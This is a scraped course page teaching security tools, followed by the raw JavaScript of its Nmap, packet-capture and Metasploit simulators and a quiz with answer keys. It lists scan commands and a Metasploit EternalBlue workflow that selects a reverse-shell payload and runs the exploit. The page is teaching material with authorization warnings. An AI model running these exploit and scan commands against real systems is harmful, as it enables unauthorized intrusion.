MODULE 06 — SECURITY TOOLS

Essential Security Tools

Every security professional needs a toolbox. Wireshark for traffic analysis, Nmap for reconnaissance, and Metasploit for exploitation. These are the foundational tools of both red team and blue team operations.

The Security Professional's Toolbox

Security work without tools is like surgery without instruments. Whether you're defending a network (blue team) or testing its defenses (red team), you need tools for reconnaissance, analysis, exploitation, and reporting.

Reconnaissance

Discover hosts, services, and vulnerabilities on a network. The first step in any assessment.

Analysis

Capture and examine network traffic, logs, and artifacts. Find the needle in the haystack.

Exploitation

Validate vulnerabilities by safely exploiting them. Prove impact to stakeholders.

Wireshark

Network Protocol Analyzer

What it does: Captures and analyzes network packets in real-time. Think of it as a microscope for network traffic. Every packet that crosses your network interface is captured, decoded, and displayed — headers, payloads, protocols, everything.

BLUE TEAM USES
  • - Investigate suspicious traffic patterns
  • - Detect data exfiltration (large outbound transfers)
  • - Analyze malware C2 (command & control) callbacks
  • - Verify encryption is working (TLS handshake analysis)
  • - Troubleshoot network connectivity issues
RED TEAM USES
  • - Capture credentials sent in plaintext (HTTP, FTP)
  • - Analyze target network topology and services
  • - Man-in-the-middle attack validation
  • - DNS exfiltration channel detection
  • - Protocol fuzzing and vulnerability research
Key display filters:
http.request.method == "POST" — Show only HTTP POST requests (login forms, file uploads)
ip.addr == 192.168.1.100 — All traffic to/from a specific IP
tcp.port == 443 — All HTTPS traffic
dns.qry.name contains "evil" — DNS queries containing "evil"
tcp.flags.syn == 1 && tcp.flags.ack == 0 — SYN packets only (port scan detection)

Nmap

Network Mapper — Port Scanner & Recon Tool

What it does: Discovers hosts and services on a network by sending carefully crafted packets and analyzing responses. Nmap is the Swiss Army knife of network reconnaissance — it can identify live hosts, open ports, running services, OS versions, and even known vulnerabilities.

Essential Nmap commands:
nmap -sn 192.168.1.0/24 — Ping sweep (discover live hosts, no port scan)
nmap -sS 192.168.1.100 — SYN stealth scan (default, fast, doesn't complete TCP handshake)
nmap -sV -sC 192.168.1.100 — Version detection + default scripts (identify exact service versions)
nmap -O 192.168.1.100 — OS fingerprinting (determine operating system)
nmap -p- 192.168.1.100 — Scan ALL 65,535 ports (thorough but slow)
nmap -A 192.168.1.100 — Aggressive scan (OS + version + scripts + traceroute)
nmap --script vuln 192.168.1.100 — Run vulnerability scanning scripts
Legal warning: Never scan networks you don't own or have explicit written permission to test. Unauthorized port scanning can be illegal in many jurisdictions.

Metasploit Framework

Exploitation & Penetration Testing Platform

What it does: A massive open-source framework containing thousands of exploits, payloads, and auxiliary modules for penetration testing. If Nmap finds the unlocked door, Metasploit walks through it. Used by pentesters to safely validate vulnerabilities and demonstrate real-world impact.

Typical Metasploit workflow:
msfconsole — Launch the Metasploit console
search eternalblue — Search for exploits by name/CVE
use exploit/windows/smb/ms17_010_eternalblue — Select an exploit module
set RHOSTS 192.168.1.100 — Set the target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp — Choose a payload
exploit — Execute the exploit and get a shell
Exploits

Code that takes advantage of a vulnerability (e.g., buffer overflow, SQL injection)

Payloads

Code that runs after exploitation (reverse shell, Meterpreter, command execution)

Auxiliary

Non-exploit modules: scanners, fuzzers, DoS testers, credential checkers

Other Essential Tools

Burp Suite

Web application security testing platform. Intercepts HTTP requests, scans for vulnerabilities (XSS, SQLi), fuzzes parameters. The #1 tool for web app pentesters.

John the Ripper / Hashcat

Password cracking tools. John is CPU-based, Hashcat leverages GPUs for speed. Used to test password strength and crack captured hashes. Supports hundreds of hash formats.

Gobuster / FFUF

Directory/file brute-forcing tools. Discover hidden pages, API endpoints, and subdomains on web servers. Essential for web application recon.

tcpdump

Command-line packet analyzer. Lightweight alternative to Wireshark for servers without a GUI. Perfect for capturing traffic on remote Linux servers via SSH.

Hydra

Online brute-force tool for login services (SSH, FTP, HTTP, RDP). Tests username/password combinations against network services at high speed.

Netcat (nc)

The "Swiss Army knife" of networking. Read/write data across network connections. Used for port listening, file transfer, reverse shells, banner grabbing.

Nmap Scan Types Explained

-sSSYN Stealth Scan (Default)

Sends SYN packet. If SYN/ACK comes back, port is open. Sends RST instead of completing the handshake — the connection is never fully established, so it's less likely to be logged.

Client --[SYN]--> Server --[SYN/ACK]--> Client --[RST]--> (connection never completed)
-sTTCP Connect Scan

Completes the full TCP 3-way handshake. More reliable but louder — connections appear in server logs. Used when user doesn't have raw packet privileges.

Client --[SYN]--> Server --[SYN/ACK]--> Client --[ACK]--> (full connection, then close)
-sUUDP Scan

Scans UDP ports (DNS:53, DHCP:67/68, SNMP:161, TFTP:69). Very slow because UDP is connectionless — no guaranteed response for open ports. ICMP "port unreachable" = closed.

-sVVersion Detection

After finding open ports, sends probes to determine the exact service and version running. Turns "port 80 open" into "Apache httpd 2.4.51 (Ubuntu)". Critical for finding exploitable versions.

--scriptNSE (Nmap Scripting Engine)

Nmap has 600+ scripts for vulnerability scanning, brute-forcing, service enumeration, and more. Categories: vuln, safe, intrusive, discovery, auth.

Wireshark Protocol Analysis

Understanding packet structure is key to effective analysis. Every captured frame contains nested protocol headers:

Layer 2 — Ethernet Frame Src MAC | Dst MAC | EtherType (0x0800=IPv4)
Layer 3 — IP Header Src IP | Dst IP | TTL | Protocol (6=TCP, 17=UDP)
Layer 4 — TCP Header Src Port | Dst Port | Seq# | Ack# | Flags (SYN/ACK/FIN)
Layer 7 — Application Data HTTP Request/Response | DNS Query | TLS Handshake

Security+ Exam Focus (Domain 4: Security Operations)

Interactive Tool Simulators

Try running common security tool commands in these safe simulators. No real networks are scanned.

Nmap Scanner Simulator

Type an Nmap command below. Try: nmap -sS 10.0.0.1, nmap -sV 10.0.0.1, nmap -sn 10.0.0.0/24, nmap -O 10.0.0.1, nmap -A 10.0.0.1

nmap-simulator
Welcome to the Nmap Simulator. Type a command below.
Simulated target network: 10.0.0.0/24
$

Packet Capture Viewer

A simulated network capture. Click on any packet to inspect its details — just like Wireshark.

No.SourceDestinationProtoLenInfo

Metasploit Console Simulator

Try: search eternalblue, use exploit/windows/smb/ms17_010_eternalblue, show options, set RHOSTS 10.0.0.5, exploit

metasploit-simulator
=[ metasploit v6.3.55-dev (simulator) ]
+ -- --=[ 2397 exploits - 1235 auxiliary - 43 post ]
+ -- --=[ 1290 payloads - 47 encoders - 11 nops ]
Tip: This is a safe learning simulator. No real exploits are run.
msf6 >

Knowledge Check

Admin Panel...\n\n[!] WARNING: Admin panel served over plaintext HTTP. Credentials visible to network sniffers.' }, { no: 10, src: '10.0.0.50', dst: '10.0.0.10', proto: 'HTTP', len: 580, info: 'POST /admin/login.php HTTP/1.1', type: 'http', detail: 'HTTP Request\nMethod: POST\nURI: /admin/login.php\nContent-Type: application/x-www-form-urlencoded\n\nBody: username=admin&password=P@ssw0rd123\n\n[!!!] CRITICAL: Plaintext credentials captured!\nUsername: admin\nPassword: P@ssw0rd123' }, { no: 11, src: '10.0.0.50', dst: '10.0.0.10', proto: 'TLS', len: 517, info: 'Client Hello (TLSv1.3)', type: 'tls', detail: 'TLS Record Layer\nContent Type: Handshake (22)\nVersion: TLS 1.0 (compatibility)\n\nHandshake Protocol: Client Hello\nVersion: TLS 1.3\nRandom: a7b2c3d4e5f6...\nCipher Suites (3):\n TLS_AES_256_GCM_SHA384\n TLS_CHACHA20_POLY1305_SHA256\n TLS_AES_128_GCM_SHA256' }, { no: 12, src: '10.0.0.10', dst: '10.0.0.50', proto: 'TLS', len: 2190, info: 'Server Hello, Certificate, Finished', type: 'tls', detail: 'TLS Record Layer\nHandshake Protocol: Server Hello\n Cipher Suite: TLS_AES_256_GCM_SHA384\n\nCertificate:\n Subject: CN=webserver.corp.local\n Issuer: CN=Corp Internal CA\n Valid: 2025-01-01 to 2027-01-01\n Public Key: RSA 2048-bit\n\n[Encrypted data follows - content not visible]' }, { no: 13, src: '10.0.0.50', dst: '198.51.100.66', proto: 'TCP', len: 120, info: '49200 -> 443 [SYN] Seq=0 (to C2)', type: 'tcp', detail: 'TCP Segment\nSrc Port: 49200 Dst Port: 443\nFlags: SYN\nDst: 198.51.100.66\n\n[!!!] ALERT: Outbound connection to known C2 IP 198.51.100.66\nThis host may be compromised!' }, ]; let packetFilter = 'all'; function renderPackets() { const container = document.getElementById('packetList'); const filtered = packetFilter === 'all' ? PACKETS : PACKETS.filter(p => p.type === packetFilter); container.innerHTML = filtered.map(p => { const color = p.proto === 'HTTP' ? 'text-emerald-400' : p.proto === 'DNS' ? 'text-cyan-400' : p.proto === 'TCP' ? 'text-slate-400' : p.proto === 'TLS' ? 'text-purple-400' : 'text-amber-400'; return `
${p.no}${p.src}${p.dst}${p.proto}${p.len}${p.info}
`; }).join(''); } function filterPackets(f) { packetFilter = f; document.querySelectorAll('.pcap-filter').forEach(btn => { btn.classList.toggle('bg-cyan-500/10', btn.dataset.f === f); btn.classList.toggle('border-cyan-500/30', btn.dataset.f === f); btn.classList.toggle('text-cyan-400', btn.dataset.f === f); btn.classList.toggle('bg-slate-800', btn.dataset.f !== f); btn.classList.toggle('border-slate-700', btn.dataset.f !== f); btn.classList.toggle('text-slate-500', btn.dataset.f !== f); }); renderPackets(); document.getElementById('packetDetail').classList.add('hidden'); } function showPacketDetail(no) { const pkt = PACKETS.find(p => p.no === no); if (!pkt) return; document.querySelectorAll('.packet-row').forEach(r => r.classList.remove('selected')); event.currentTarget.classList.add('selected'); const detail = document.getElementById('packetDetail'); detail.classList.remove('hidden'); const isSuspicious = pkt.detail.includes('[!]') || pkt.detail.includes('[!!!]'); let html = `
Packet #${pkt.no} — ${pkt.proto}
`; html += `
${pkt.detail.replace(/\[!!!\]/g, '[!!!]').replace(/\[!\]/g, '[!]')}
`; detail.innerHTML = html; } renderPackets(); // ========== METASPLOIT SIMULATOR ========== let msfState = { module: null, options: { RHOSTS: '', LHOST: '10.0.0.50', PAYLOAD: 'windows/x64/meterpreter/reverse_tcp' } }; function addMsfLine(text, cls = 'text-slate-400') { const term = document.getElementById('msfTerminal'); const el = document.createElement('div'); el.className = `term-line ${cls}`; el.innerHTML = text; term.appendChild(el); term.scrollTop = term.scrollHeight; } function updateMsfPrompt() { document.getElementById('msfPrompt').textContent = msfState.module ? `msf6 exploit(${msfState.module.split('/').pop()}) >` : 'msf6 >'; } function runMsf() { const input = document.getElementById('msfInput'); const cmd = input.value.trim(); input.value = ''; if (!cmd) return; addMsfLine((msfState.module ? `msf6 exploit(${msfState.module.split('/').pop()}) > ` : 'msf6 > ') + cmd, 'text-slate-300'); const parts = cmd.split(/\s+/); const action = parts[0].toLowerCase(); if (action === 'help' || action === '?') { addMsfLine('Core Commands: search, use, show, set, exploit/run, back, exit', 'text-slate-500'); } else if (action === 'search') { const term = parts.slice(1).join(' ').toLowerCase(); const results = [ { name: 'exploit/windows/smb/ms17_010_eternalblue', date: '2017-03-14', rank: 'great', desc: 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption' }, { name: 'exploit/windows/smb/ms17_010_psexec', date: '2017-03-14', rank: 'normal', desc: 'MS17-010 EternalRomance/EternalSynergy SMB RCE' }, { name: 'auxiliary/scanner/smb/smb_ms17_010', date: '2017-03-14', rank: 'normal', desc: 'MS17-010 SMB RCE Detection' }, ]; const matched = results.filter(r => r.name.includes(term) || r.desc.toLowerCase().includes(term)); if (matched.length === 0) { addMsfLine('No results found.', 'text-amber-400'); return; } addMsfLine('Matching Modules', 'text-emerald-400'); addMsfLine('================', 'text-slate-600'); addMsfLine(' # Name Disclosure Date Rank Description', 'text-slate-500'); addMsfLine(' - ---- --------------- ---- -----------', 'text-slate-700'); matched.forEach((r, i) => { addMsfLine(` ${i} ${r.name} ${r.date} ${r.rank} ${r.desc}`, 'text-slate-400'); }); } else if (action === 'use') { msfState.module = parts[1] || ''; addMsfLine(`[*] Using configured payload ${msfState.options.PAYLOAD}`, 'text-blue-400'); updateMsfPrompt(); } else if (action === 'back') { msfState.module = null; updateMsfPrompt(); } else if (action === 'show' && parts[1] === 'options') { if (!msfState.module) { addMsfLine('No module selected. Use "use" first.', 'text-amber-400'); return; } addMsfLine('Module options (exploit/windows/smb/ms17_010_eternalblue):', 'text-slate-300'); addMsfLine('', ''); addMsfLine(' Name Current Setting Required Description', 'text-slate-500'); addMsfLine(' ---- --------------- -------- -----------', 'text-slate-700'); addMsfLine(` RHOSTS ${msfState.options.RHOSTS || '(not set)'} yes Target IP`, 'text-slate-400'); addMsfLine(` RPORT 445 yes Target port (SMB)`, 'text-slate-400'); addMsfLine('', ''); addMsfLine('Payload options (windows/x64/meterpreter/reverse_tcp):', 'text-slate-300'); addMsfLine(` LHOST ${msfState.options.LHOST} yes Listen address`, 'text-slate-400'); addMsfLine(` LPORT 4444 yes Listen port`, 'text-slate-400'); } else if (action === 'set') { const key = (parts[1] || '').toUpperCase(); const val = parts.slice(2).join(' '); if (key && val) { msfState.options[key] = val; addMsfLine(`${key} => ${val}`, 'text-slate-300'); } } else if (action === 'exploit' || action === 'run') { if (!msfState.module) { addMsfLine('No module selected.', 'text-amber-400'); return; } if (!msfState.options.RHOSTS) { addMsfLine('[!] RHOSTS is not set. Use: set RHOSTS ', 'text-red-400'); return; } addMsfLine(`[*] Started reverse TCP handler on ${msfState.options.LHOST}:4444`, 'text-blue-400'); setTimeout(() => addMsfLine(`[*] ${msfState.options.RHOSTS}:445 - Connecting to target for exploitation...`, 'text-blue-400'), 300); setTimeout(() => addMsfLine(`[+] ${msfState.options.RHOSTS}:445 - Target OS: Windows Server 2019 Build 17763`, 'text-emerald-400'), 600); setTimeout(() => addMsfLine(`[*] ${msfState.options.RHOSTS}:445 - Sending exploit packet...`, 'text-blue-400'), 900); setTimeout(() => addMsfLine(`[+] ${msfState.options.RHOSTS}:445 - EXPLOIT SUCCESSFUL!`, 'text-emerald-400'), 1400); setTimeout(() => addMsfLine(`[*] Sending stage (200774 bytes) to ${msfState.options.RHOSTS}`, 'text-blue-400'), 1700); setTimeout(() => { addMsfLine(`[*] Meterpreter session 1 opened (${msfState.options.LHOST}:4444 -> ${msfState.options.RHOSTS}:49158)`, 'text-emerald-400'); addMsfLine('', ''); addMsfLine('meterpreter > [This is a simulation — no real system was exploited]', 'text-amber-400'); }, 2200); } else if (action === 'exit') { addMsfLine('Goodbye!', 'text-slate-500'); msfState.module = null; updateMsfPrompt(); } else { addMsfLine(`[-] Unknown command: ${action}. Type "help" for available commands.`, 'text-red-400'); } } // ========== QUIZ ========== const quizData = [ { q: "Which tool is primarily used for capturing and analyzing network traffic?", o: ["Nmap", "Metasploit", "Wireshark", "Hydra"], correct: 2 }, { q: "The Nmap flag '-sS' performs what type of scan?", o: ["UDP scan", "Full TCP connect scan", "SYN stealth scan", "Version detection scan"], correct: 2 }, { q: "In Metasploit, what is a 'payload'?", o: ["The vulnerability being exploited", "Code that runs after exploitation", "The target IP address", "A scanning module"], correct: 1 }, { q: "Which Wireshark filter would show only HTTP POST requests?", o: ["tcp.port == 80", "http.request.method == \"POST\"", "http.response.code == 200", "ip.proto == http"], correct: 1 }, { q: "Which Nmap flag performs OS fingerprinting?", o: ["-sV", "-sS", "-O", "-sU"], correct: 2 }, { q: "What is the primary purpose of a vulnerability scanner (like Nessus)?", o: ["Exploit vulnerabilities automatically", "Identify known vulnerabilities without exploiting them", "Block incoming network attacks", "Encrypt network traffic"], correct: 1 }, { q: "tcpdump is best described as:", o: ["A GUI packet analyzer", "A command-line packet capture tool", "A password cracking utility", "A web vulnerability scanner"], correct: 1 }, { q: "Before performing a penetration test, you MUST have:", o: ["The latest version of Kali Linux", "Written authorization and defined scope", "A VPN connection", "Root access to the target"], correct: 1 } ]; const userAnswers = {}; function renderQuiz() { const container = document.getElementById('quizContainer'); let html = ''; quizData.forEach((q, qi) => { html += `

${qi + 1}. ${q.q}

`; q.o.forEach((opt, oi) => { html += ``; }); html += `
`; }); container.innerHTML = html; } function selectAnswer(qi, oi) { userAnswers[qi] = oi; document.querySelectorAll(`[data-q="${qi}"]`).forEach(btn => { btn.classList.remove('border-cyan-500', 'bg-cyan-500/10', 'text-cyan-300'); if (parseInt(btn.dataset.o) === oi) { btn.classList.add('border-cyan-500', 'bg-cyan-500/10', 'text-cyan-300'); } }); } function submitQuiz() { let score = 0; quizData.forEach((q, qi) => { document.querySelectorAll(`[data-q="${qi}"]`).forEach((btn, oi) => { btn.onclick = null; btn.classList.remove('border-cyan-500', 'bg-cyan-500/10', 'text-cyan-300'); if (oi === q.correct) { btn.classList.add('correct'); } else if (userAnswers[qi] === oi) { btn.classList.add('wrong'); btn.classList.remove('border-slate-700', 'border-cyan-500', 'bg-cyan-500/10'); } }); if (userAnswers[qi] === q.correct) score++; }); const pct = Math.round(score / quizData.length * 100); const resultEl = document.getElementById('quizResult'); resultEl.classList.remove('hidden'); resultEl.innerHTML = `
${score}/${quizData.length} (${pct}%)

${pct >= 75 ? 'Great job! You know your security tools.' : 'Review the material above and try again.'}

`; document.getElementById('submitQuizBtn').style.display = 'none'; if (score === quizData.length) { localStorage.setItem('security_tools', 'true'); setTimeout(() => document.getElementById('completionModal').classList.add('show'), 500); } } renderQuiz();

All certification names are referenced for educational purposes only. This project is not affiliated with any certification body.